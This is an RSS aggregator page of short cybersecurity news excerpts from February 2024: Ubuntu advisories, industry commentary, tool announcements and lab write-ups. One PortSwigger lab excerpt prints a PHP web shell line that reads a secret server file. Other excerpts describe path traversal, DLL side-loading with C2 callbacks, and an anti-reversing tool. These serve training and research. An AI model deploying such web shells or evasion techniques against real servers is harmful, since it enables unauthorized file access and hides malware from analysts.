It was discovered that LibTIFF incorrectly handled certain files. If a user were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause the application to crash, resulting in a denial of service. (CVE-2023-52356) It was discovered that LibTIFF incorrectly handled certain image files with the tiffcp utility. If a user were tricked into opening a specially crafted image file, an attacker could possibly use this issue to cause tiffcp to crash, resulting in a denial of service. (CVE-2023-6228) It was discovered that LibTIFF incorrectly handled certain files. If a user were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause the application to consume resources, resulting in a denial of service. (CVE-2023-6277)...
https://ubuntu.com/security/notices/USN-6644-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6643-1: NPM IP vulnerability
Emre Durmaz discovered that NPM IP package incorrectly distinguished between private and public IP addresses. A remote attacker could possibly use this issue to perform Server-Side Request Forgery (SSRF) attacks.
https://ubuntu.com/security/notices/USN-6643-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why keeping track of user accounts is important
CISA has issued an advisory after the discovery of documents containing information about a state government organization's network environment on a dark web brokerage site.
https://www.malwarebytes.com/blog/news/2024/02/why-keeping-track-of-user-accounts-is-important
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Four Ways Genai Will Change the Contours Of The Corporate Landscape In 2024
By Neil Serebryany, CEO and Founder of CalypsoAI Generative artificial intelligence (GenAI) models, including large language models (LLMs) have been the focal point of the business world's attention since ChatGPT […] The post Four Ways Genai Will Change the Contours Of The Corporate Landscape In 2024 appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/four-ways-genai-will-change-the-contours-of-the-corporate-landscape-in-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16 Common Types Of Cyberattacks And How To Prevent Them
This week in cybersecurity from the editors at Cybercrime Magazine – Read the Full Story in TechTarget Sausalito, Calif. – Feb. 19, 2024 Today’s cybercriminals are not part-time amateurs or script kiddies but rather state-sponsored adversaries and professional criminals looking to steal information and make The post 16 Common Types Of Cyberattacks And How To Prevent Them appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/16-common-types-of-cyberattacks-and-how-to-prevent-them/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-6642-1: Bind vulnerabilities
Shoham Danino, Anat Bremler-Barr, Yehuda Afek, and Yuval Shavitt discovered that Bind incorrectly handled parsing large DNS messages. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2023-4408) Elias Heftrig, Haya Schulmann, Niklas Vogel, and Michael Waidner discovered that Bind icorrectly handled validating DNSSEC messages. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2023-50387) It was discovered that Bind incorrectly handled preparing an NSEC3 closest encloser proof. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. (CVE-2023-50868) It was discovered that Bind incorrectly handled...
https://ubuntu.com/security/notices/USN-6642-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VPNs in Times of War: Why a Rise in Global Conflicts Mean Citizens Now Need VPNs More Than Ever
A NEW era of global instability is dawning. By Sebastian Schaub, CEO, hide.me Russia's ongoing invasion of Ukraine continues to fan the flames of war in Europe. American and Chinese […] The post VPNs in Times of War: Why a Rise in Global Conflicts Mean Citizens Now Need VPNs More Than Ever appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/vpns-in-times-of-war-why-a-rise-in-global-conflicts-mean-citizens-now-need-vpns-more-than-ever/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SwaggerSpy - Automated OSINT On SwaggerHub
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals. What is Swagger? Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API. About SwaggerHub SwaggerHub is a collaborative platform for designing, building, and managing...
http://www.kitploit.com/2024/02/swaggerspy-automated-osint-on-swaggerhub.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Missed IWCON 2023? Catch Recorded Expert Sessions Here.
Hello hackerMissed attending IWCON 2023 — the biggest virtual cybersecurity conference of the world?No worries, we're here at your service with a second chance.Over the next few weeks, we'll be sharing links to watch recordings of all our expert sessions.Vivek RamachandranSpeaker bio: Founder and CEO of @getsquarexTopic name: From Hacker to Entrepreneur: My Cybersecurity Journey and Predictions for the FutureFollow the speaker on Twitter.Video linkWatch Video hereJason HaddixSpeaker bio: BuddoBot CISO & Hacker in ChargeTopic name: Recon Like an AdversaryFollow the speaker on Twitter.Video linkWatch video hereJoseph Thacker aka rez0_Speaker bio: Offensive security engineer at AppOmni. Founder of WeHackAI.Topic name: AI Application Security: Understanding Prompt Injection...
https://infosecwriteups.com/missed-iwcon-2023-catch-recorded-expert-sessions-here-8d62cf34dd37?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Getting AI Right for Security: 5 Principles
By Kevin Kennedy, SVP Products, Vectra AI Now more than ever, companies need effective security solutions. The cost of global cybercrime is projected to grow by seventeen percent each year, […] The post Getting AI Right for Security: 5 Principles appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/getting-ai-right-for-security-5-principles/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Virtual Visions to Tangible Profits: A Founder's Guide to Launching a vCISO Firm in 2024
By Caroline McCaffrey, CEO and Co-founder, ClearOPS Most people find themselves in cybersecurity because they find its ever-changing landscape interesting. 2023 did not disappoint with new concerns over liability in […] The post From Virtual Visions to Tangible Profits: A Founder’s Guide to Launching a vCISO Firm in 2024 appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/from-virtual-visions-to-tangible-profits-a-founders-guide-to-launching-a-vciso-firm-in-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

HTB — Lame
First box, first own! not so lame now huh?Continue reading on InfoSec Write-ups »
https://infosecwriteups.com/htb-lame-13b949b481dc?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AzSubEnum - Azure Service Subdomain Enumeration
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services. How it works? AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains...
http://www.kitploit.com/2024/02/azsubenum-azure-service-subdomain.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Portswigger — Path Traversal All Labs Walkthrough(Bug Bounty Prep)[by dollarboysushil]
Portswigger — Path Traversal All Labs Walkthrough(Bug Bounty Prep)[by dollarboysushil]Link to portswigger academy: https://portswigger.net/web-security/file-path-traversalFor any correction / query /suggestion contact onInstagram dollarboysushilTwitter (X) dollarboysushilYoutube dollarboysushilLinkedin dollarboysushilWhat is path traversal?Path traversal or directory traversal is a vulnerability which allows an attacker to read arbitrary files on the server which they should not have access.Reading arbitrary files via path traversalLets look at an example to understand how path traversal attack occurshttps://insecure-website.com/loadImage?filename=64.pngIn the above URL filename parameter is used to load the image file, 64.image in this case. If there is not any proper validation or...
https://infosecwriteups.com/portswigger-path-traversal-all-labs-walkthrough-bug-bounty-prep-by-dollarboysushil-85ab64d6106a?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DLL Side Loading Technique #Threat Hunting & #Adversary Emulation
One of my favorite techniques, which every APT group uses in cyber attacks, involves DLL SideLoading.Most commonly, we see APT groups using signed Microsoft executables to load malicious DLLs.From the attacker's point of view :The threat actor sends a zip file containing a malicious DLL and a Microsoft-signed executable. The threat actor tricks the user into executing the signed executable. When the executable is run, the malicious DLL is loaded, downloads the second stage payload, creates persistence, or establishes a reverse connection to the C2 server.In the example below, you can see a folder containing ‘WFS.exe' and a malicious DLL. ‘WFS.exe' is a Microsoft-signed executable.The DLL contains a simple C program, which is designed to pop up a message box saying ‘Success,'...
https://infosecwriteups.com/dll-side-loading-technique-threat-hunting-adversary-emulation-71d380c07f2c?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Key Concepts in Secure Software Development: A Pentester's Perspective
Web, mobile, and desktop applications are crucial in today's tech world. Most software developers overlook the concept of ‘security' while developing these applications. In this article, I will address some challenges I have encountered both in software development and penetration testing.Purpose of SoftwareRegardless of size, every software begins with an idea before coming into existence. Each software has a idea it serves in the background, and there are features it must have to fulfill that purpose. For instance, in a banking system, the purpose is to organize money transfers, provide information about budget, etc. The situation is no different for small-scale applications. For example, the purpose of a simple note-taking app is to create a product where users can store and organize...
https://infosecwriteups.com/key-concepts-in-secure-software-development-a-pentesters-perspective-c117474fa33e?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Harnessing Microsoft Copilot as a Cybersecurity Advisor
Microsoft Copilot, an AI-powered assistant integrated into Windows 11 and various Microsoft applications, is poised to revolutionize the role of cybersecurity advisors.Let's dive into how cybersecurity professionals can leverage Microsoft Copilot to enhance their advisory capabilities and bolster security practices.Understanding Microsoft CopilotMicrosoft Copilot is an AI assistant designed to assist users with various tasks, including finding information, creating content, and learning new skills. Integrated seamlessly into Windows 11 and Microsoft applications such as Word, Excel, PowerPoint, and Teams, Copilot serves as an everyday companion for users, offering assistance through conversational interfaces.Utilizing Copilot in Cybersecurity Advisory RolesCybersecurity advisors play a...
https://infosecwriteups.com/harnessing-microsoft-copilot-as-a-cybersecurity-advisor-518c46f697b3?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PortSwigger — LAB-5 Web shell upload via obfuscated file extension (Bug Bounty Prep)[by…
PortSwigger — LAB-5 Web shell upload via obfuscated file extension (Bug Bounty Prep)[by dollarboysushil]Link to lab: https://portswigger.net/web-security/file-upload/lab-file-upload-web-shell-upload-via-obfuscated-file-extensionFor any correction / query /suggestion contact onInstagram dollarboysushilTwitter (X) dollarboysushilYoutube dollarboysushilLinkedin dollarboysushilDiscord https://discord.gg/5jpkdeVLevel : Intermediate — . Highly recommended to solve previous labsLogin with given credentials.Our Aim is to read content of /home/carlos/secretFor which, we will use this simple php code.<?php echo file_get_contents('/home/carlos/secret'); ?>This php code uses file_get_contents to read the content of file located at /home/carlos/secret which then echos the output.Before...
https://infosecwriteups.com/portswigger-lab-5-web-shell-upload-via-obfuscated-file-extension-bug-bounty-prep-by-5232dd3fb8fa?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Amazon's Network Offers Potential For Disaster Response and Military Communications
Through its subsidiary Kuiper Systems, Amazon AMZN -1.2% will start providing broadband internet service from orbit later this year, most likely around the holidays. The first satellites of the project were launched in October of last year, and it has been under development since 2019.The project, which aims to provide low-latency connections to billions of people without dependable internet access worldwide, is conceptually similar to the SpaceX Starlink constellation. But Kuiper is doing more than just providing low-Earth orbit with high-speed internet access. It is adding capabilities to its constellation of more than 3,200 satellites to fortify the project against cyberattacks, electronic jamming, and other dangers to U.S. space assets.The most notable aspect of this constellation is...
https://infosecwriteups.com/amazons-network-offers-potential-for-disaster-response-and-military-communications-b68a847a340c?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The UI Slip I Hit 750$: UI Manipulation Leading to Unauthorized Permission Changes
Discover how an U.I mistake allowed unauthorized permission changes in Private Program and bypass the membership requirements. Learn the steps to reproduce this security flaw and its potential impact on platform and user privacy.Understanding TargetExamFront (Virtual name Of a Private Program) stands out as a specialized space for managing deals, partnerships, and collaborations. This platform is designed to streamline the intricate processes involved in deal-making, offering a centralized hub for organizations to orchestrate their business agreements seamlessly.The FlowTypically, when a user is created in the organization, they are granted all the default permissions. To remove these permissions, the organization requires the to obtain membership privileges. However, I have identified a...
https://infosecwriteups.com/the-ui-slip-i-hit-750-ui-manipulation-leading-to-unauthorized-permission-changes-d65621d8dd96?source=rss----7b722bfd1b8d---4
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MrHandler - Linux Incident Response Reporting
 MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents. 𝗜𝗡𝗦𝗧𝗔𝗟𝗟𝗔𝗧𝗜𝗢𝗡 𝗜𝗡𝗦𝗧𝗥𝗨𝗖𝗧𝗜𝗢𝗡𝗦 $ pip3 install colorama $ pip3 install paramiko $ git clone https://github.com/emrekybs/BlueFish.git $ cd MrHandler...
http://www.kitploit.com/2024/02/mrhandler-linux-incident-response.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From the SIEM to the Lake: Bridging the Gap for Splunk Customers Post-Acquisition
By Omer Singer, VP of Strategy, Anvilogic The smoke has cleared on Cisco's largest acquisition ever: that of Splunk for billion in September. This acquisition has added a new […] The post From the SIEM to the Lake: Bridging the Gap for Splunk Customers Post-Acquisition appeared first on Cyber Defense Magazine.
https://www.cyberdefensemagazine.com/from-the-siem-to-the-lake-bridging-the-gap-for-splunk-customers-post-acquisition/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google Launches ‘AI Cyber Defense Initiative' At The Munich Security Conference
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Cybercrime Magazine Interview Sausalito, Calif. – Feb. 17, 2024 Google’s ‘AI Cyber Defense Initiative,’ launched at the Munich Security Conference on Feb. 16, signals a belief that the company’s experience in The post Google Launches ‘AI Cyber Defense Initiative’ At The Munich Security Conference appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/google-launches-ai-cyber-defense-initiative-at-the-munich-security-conference/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metasploit Weekly Wrap-Up 02/16/2024
Metasploit adds an SMB fetch payload and new Base64 command encoder.
https://blog.rapid7.com/2024/02/16/metasploit-weekly-wrap-up-02-16-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2024-21410)
What is the Vulnerability? Microsoft disclosed a critical security flaw in the Exchange Server. Tracked as CVE-2024-21410, the issue has been described as a privilege escalation vulnerability. This security flaw can let remote unauthenticated threat actors escalate privileges in NTLM relay attacks against vulnerable Exchange Servers. Microsoft reported that the flaw has been actively exploited in the wild. What is the Vendor Solution? Microsoft released a patch on Feb 13, 2024, as part of its Patch Tuesday updates. Please follow the link to learn more about mitigation steps. [ Link ] What FortiGuard Coverage is available? FortiGuard Labs has an Endpoint Vulnerability Signature in place for CVE-2024-21410 to detect any vulnerable systems and auto patch if enabled. FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/5382
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Revolutionising identity services using AI
The ‘NCSC for Startups' alumnus giving identity verification the 'Trust Stamp'
https://www.ncsc.gov.uk/blog-post/revolutionising-identity-services-using-ai
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Leadership Careers: Competition For Top Cybersecurity Talent Is Fierce
This week in cybersecurity from the editors at Cybercrime Magazine – Read the full story in the Dallas Business Journal Sausalito, Calif. – Feb. 16, 2024 The size and complexity of the cybercrime problem mean there are tremendous opportunities for professionals interested in developing leadership The post Leadership Careers: Competition For Top Cybersecurity Talent Is Fierce appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/leadership-careers-competition-for-top-cybersecurity-talent-is-fierce/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber-insurance and vulnerability scanning – Week in security with Tony Anscombe
Here's how the results of vulnerability scans factor into decisions on cyber-insurance and how human intelligence comes into play in the assessment of such digital signals
https://www.welivesecurity.com/en/videos/cyber-insurance-and-vulnerability-scanning-week-security-tony-anscombe/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ISC2 Collaborates with IBM to Launch Entry-Level Cybersecurity Certificate
ISC2 – the world's leading nonprofit member organization for cybersecurity professionals – announced a partnership with IBM (NYSE: IBM) to launch the IBM and ISC2 Cybersecurity Specialist Professional Certificate. The new entry-level program, available exclusively via the Coursera platform, is designed to prepare prospective cybersecurity professionals for a career in the field. By completing a joint 12-course series, […] The post ISC2 Collaborates with IBM to Launch Entry-Level Cybersecurity Certificate first appeared on IT Security Guru. The post ISC2 Collaborates with IBM to Launch Entry-Level Cybersecurity Certificate appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/isc2-collaborates-with-ibm-to-launch-entry-level-cybersecurity-certificate/?utm_source=rss&utm_medium=rss&utm_campaign=isc2-collaborates-with-ibm-to-launch-entry-level-cybersecurity-certificate
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Meet This Year's Most Inspiring Women in Cyber Nominees: Part 2
The nominations for the Most Inspiring Women in Cyber awards are out! It's always wonderful to read about the incredible women in our industry, who are making fantastic contributions and paving the way for others. This year we had so many exceptional nominees. MIWIC24 is sponsored by ThinkCyber, BT and Plexal, in partnership with WiCyS […] The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 2 first appeared on IT Security Guru. The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 2 appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/meet-this-years-most-inspiring-women-in-cyber-nominees-part-2/?utm_source=rss&utm_medium=rss&utm_campaign=meet-this-years-most-inspiring-women-in-cyber-nominees-part-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Meet This Year's Most Inspiring Women in Cyber Nominees: Part 3
The nominations for the Most Inspiring Women in Cyber awards are out! It's always wonderful to read about the incredible women in our industry, who are making fantastic contributions and paving the way for others. This year we had so many exceptional nominees. MIWIC24 is sponsored by ThinkCyber, BT and Plexal, in partnership with WiCyS […] The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 3 first appeared on IT Security Guru. The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 3 appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/meet-this-years-most-inspiring-women-in-cyber-nominees-part-3/?utm_source=rss&utm_medium=rss&utm_campaign=meet-this-years-most-inspiring-women-in-cyber-nominees-part-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Meet This Year's Most Inspiring Women in Cyber Nominees: Part 1
The nominations for the Most Inspiring Women in Cyber awards are out! It's always wonderful to read about the incredible women in our industry, who are making fantastic contributions and paving the way for others. This year we had so many exceptional nominees. MIWIC24 is sponsored by ThinkCyber, BT and Plexal, in partnership with WiCyS […] The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 1 first appeared on IT Security Guru. The post Meet This Year's Most Inspiring Women in Cyber Nominees: Part 1 appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/16/meet-this-years-most-inspiring-women-in-cyber-nominees-part-1/?utm_source=rss&utm_medium=rss&utm_campaign=meet-this-years-most-inspiring-women-in-cyber-nominees-part-1
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes
NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes. Install git clone https://github.com/MatheuZSecurity/NullSectioncd NullSectiongcc nullsection.c -o nullsection./nullsection Advantage When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file." Make good use of the tool! Note We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.Download NullSection
http://www.kitploit.com/2024/02/nullsection-anti-reversing-tool-that.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Part 3: The Anatomy of Supply Chain Attacks: Non-Human Identities & TPRM Failure
Originally published by Astrix.Written by Alex Flores, Danielle Guetta, and Tal Skverer. “Identity is the new perimeter.” This catch phrase is present in almost every website of identity security vendors, and for a good reason. Human access, more commonly referred to as user access, is an established security program in most organizations – big or small. The realization that user identities and login credentials need to be vigorously protected with IAM policies and security tools like MFA or ...
https://cloudsecurityalliance.org/articles/part-3-the-anatomy-of-supply-chain-attacks-non-human-identities-tprm-failure
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Other Practices Are Placing Greater Trust in AI... When Will Cybersecurity?
Originally published by Dazz.Written by Noah Simon, Head of Product Marketing, Dazz.In 2023, we saw AI adoption rates soar—particularly for large language learning models (LLMs). Many industries are now incorporating AI into common processes and are seeing positive results—and not just in cost savings from performing repeatable tasks that humans would. While there are still concerns about using AI to replace humans for critical decision-making, that barrier is starting to come down as well. A...
https://cloudsecurityalliance.org/articles/other-practices-are-placing-greater-trust-in-ai-when-will-cybersecurity
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 Takeaways from a CISO Focus Group: Strategies for Managing Security and Compliance in Today's Digital Business Landscape
Originally published by RegScale.Everyone recognizes that in today's rapidly evolving business landscape, security AND compliance have become central to the success and sustainability of organizations. In an effort to gain an understanding of the customers we serve, RegScale made the decision to host a CISO Focus Group in D.C. As technology advances and threats grow in sophistication, understanding the integral role of security, navigating risk and compliance complexities, adapting to new evi...
https://cloudsecurityalliance.org/articles/5-takeaways-from-a-ciso-focus-group-strategies-for-managing-security-and-compliance-in-today-s-digital-business-landscape
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What's Required After My First SOC 2 Report?
Originally published by MJD.Written by Mike DeKock, CPA, CEO, MJD.Q: What is required after my first SOC 2 report?A: MJD AnswerYou've completed your SOC 2 report. That first-time report can be a lot of work, and it's worth celebrating while you hang the new AICPA logo on the website. So what's next? If you have done it right, it's pretty simple because your controls have been baked into the way you do business so you just need to follow the new expectations you have set for your organization....
https://cloudsecurityalliance.org/articles/what-s-required-after-my-first-soc-2-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trust Model: The First Step to Ensure Your IT Network
Originally published by Devoteam.What is Zero Trust? Zero Trust is a security approach that mandates verification, employs least privilege, and operates under the assumption of a breach for every access request to a private network, irrespective of its origin or destination. Its foundation rests on several principles to improve your security: Explicit Verification: All access attempts are authenticated and authorized based on a comprehensive set of data points, including user identity, locat...
https://cloudsecurityalliance.org/articles/trust-model-the-first-step-to-ensure-your-it-network
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Build code security skills with the GitHub Secure Code Game
Learn to find and fix security issues while having fun with Secure Code Game, now with new challenges focusing on JavaScript, Python, Go, and GitHub Actions! The post Build code security skills with the GitHub Secure Code Game appeared first on The GitHub Blog.
https://github.blog/2024-02-15-build-code-security-skills-with-the-github-secure-code-game/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI in the SOC: Enhancing Efficiency Without Replacing Human Expertise
Originally published by Abnormal Security. Written by Mick Leach.The quickened pace of AI development and release of tools like ChatGPT mark a fundamental shift in the AI conversation—moving from “what could happen” to “what will happen.”One topic that gets a significant amount of attention is whetherAI will start replacing humans in so-called “knowledge worker” jobs—those roles that require some specialized knowledge, whether an architect, pharmacist, engineer, or even a cybersecurity practi...
https://cloudsecurityalliance.org/articles/ai-in-the-soc-enhancing-efficiency-without-replacing-human-expertise
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data Governance in the Cloud
Written by Ashwin Chaudhary, CEO, Accedere. As all organizations are moving towards the digitization of data and cloud computing, it is important to protect and ensure data governance by all organizations. New data security solutions are needed considering data digitization and cloud computing. According to Gartner, “By 2025, 80% of organizations seeking to scale digital business will fail because they do not take a modern approach to data and analytics governance”. What is data governance?“E...
https://cloudsecurityalliance.org/articles/data-governance-in-the-cloud
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zero Trust Messaging Needs a Reboot
Written by Daniel Ballmer, Senior Transformation Analyst, CXO REvolutionaries, Zscaler.It's 2024, and Zero Trust adoption across industries remains somewhere below 33%. For reference, de-perimeterization, a stepping-stone to Zero Trust, was first discussed on the Jericho Forums twenty years ago. By 2010, the term Zero Trust was a staple of cybersecurity conversations. Now, public and private organizations have widely embraced the idea of Zero Trust. National governments, often several years b...
https://cloudsecurityalliance.org/articles/zero-trust-messaging-needs-a-reboot
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RCE to Sliver: IR Tales from the Field
Rapid7 Incident Response was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions.
https://blog.rapid7.com/2024/02/15/rce-to-sliver-ir-tales-from-the-field/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Protecting PBX from cyber attacks
Why small organisations need to manage their private branch exchange (PBX) telephone networks.
https://www.ncsc.gov.uk/blog-post/protecting-pbx-from-cyber-attacks
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How an Improper Access Control Vulnerability Led to Account Theft in One Click
Let's look more closely at the improper access control vulnerability type — what it is, how it's used, and how to remediate it.
https://www.hackerone.com/vulnerability-management/improper-access-control-deep-dive
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing Supply Chains with Open XDR
How Open XDR provides an effective and comprehensive means of combating threats – Aimei Wei, Chief Technical Officer, Stellar Cyber San Jose, Calif. – Feb. 15, 2024 Cyberattacks are on the rise in every industry, but software companies and their clients remain especially vulnerable because The post Securing Supply Chains with Open XDR appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/securing-supply-chains-with-open-xdr/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What is AI, really? | Unlocked 403: A cybersecurity podcast
Artificial intelligence is on everybody's lips these days, but there are also many misconceptions about what AI actually is and isn't. We unpack AI's basics, applications and broader implications.
https://www.welivesecurity.com/en/videos/ai-unlocked-403-cybersecurity-podcast/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Cyber Scheme launches training course for IoT/ICS security testers
The Cyber Scheme has announced availability of a new CSII Practitioner Training Course that has been developed as a comprehensive IoT/ICS hacking course. The aim of the course is to teach candidates all the skills they need to securely test and assess connected systems and devices in consumer, industrial, and critical infrastructure environments.  It is […] The post The Cyber Scheme launches training course for IoT/ICS security testers first appeared on IT Security Guru. The post The Cyber Scheme launches training course for IoT/ICS security testers appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/15/the-cyber-scheme-launches-training-course-for-iot-ics-security-testers/?utm_source=rss&utm_medium=rss&utm_campaign=the-cyber-scheme-launches-training-course-for-iot-ics-security-testers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Salt Security API Protection Platform Now Available for Purchase in the CrowdStrike Marketplace
Today, API security pros Salt Security have announced that the Salt Security API Protection Platform is now available for purchase in the CrowdStrike Marketplace. Salt Security integrates with the industry-leading CrowdStrike Falcon® XDR platform to provide customers with best-of-breed API runtime monitoring and AI-driven insights for a 360-degree view of API security risks for effective threat […] The post Salt Security API Protection Platform Now Available for Purchase in the CrowdStrike Marketplace first appeared on IT Security Guru. The post Salt Security API Protection Platform Now Available for Purchase in the CrowdStrike Marketplace appeared first on IT Security Guru.
https://www.itsecurityguru.org/2024/02/15/salt-security-api-protection-platform-now-available-for-purchase-in-the-crowdstrike-marketplace/?utm_source=rss&utm_medium=rss&utm_campaign=salt-security-api-protection-platform-now-available-for-purchase-in-the-crowdstrike-marketplace
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

‘GhostExodus' Tells Cybercrime Magazine: “Hacking Ruined My Life”
This week in cybersecurity from the editors at Cybercrime Magazine – Listen to the Full Cybercrime Magazine Interview Sausalito, Calif. – Feb. 15, 2024 In 2011, Jesse William McGraw aka ‘GhostExodus’, the ex-chief of Electronik Tribulation Army (ETA), a hacking collective, received a nine-year prison term The post ‘GhostExodus’ Tells Cybercrime Magazine: “Hacking Ruined My Life” appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/ghostexodus-tells-cybercrime-magazine-hacking-ruined-my-life/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Private Branch Exchange (PBX) best practice
Protecting your organisation's telephony systems from cyber attacks and telecoms fraud.
https://www.ncsc.gov.uk/guidance/private-branch-exchange-best-practice
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications
WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks. Done [x] Scan Static Files. [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.) [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter. Installation From Git git clone https://github.com/OsmanKandemir/web-wordlist-generator.gitcd web-wordlist-generator && pip3 install -r requirements.txtpython3 generator.py -d target-web.com From Dockerfile You can run this application on a container after build a Dockerfile. docker build -t webwordlistgenerator .docker run webwordlistgenerator -d target-web.com -o From DockerHub You can run this application on a container after pulling from DockerHub. docker pull...
http://www.kitploit.com/2024/02/web-wordlist-generator-creates-related.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From the cyber proliferation threat all the way to Pall Mall
The first dedicated conference on this topic – and an insight into the NCSC assessment work behind it.
https://www.ncsc.gov.uk/blog-post/cyber-proliferation-threat-conference
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Security Evolution to Generative AI: A Q&A with an Industry Leader
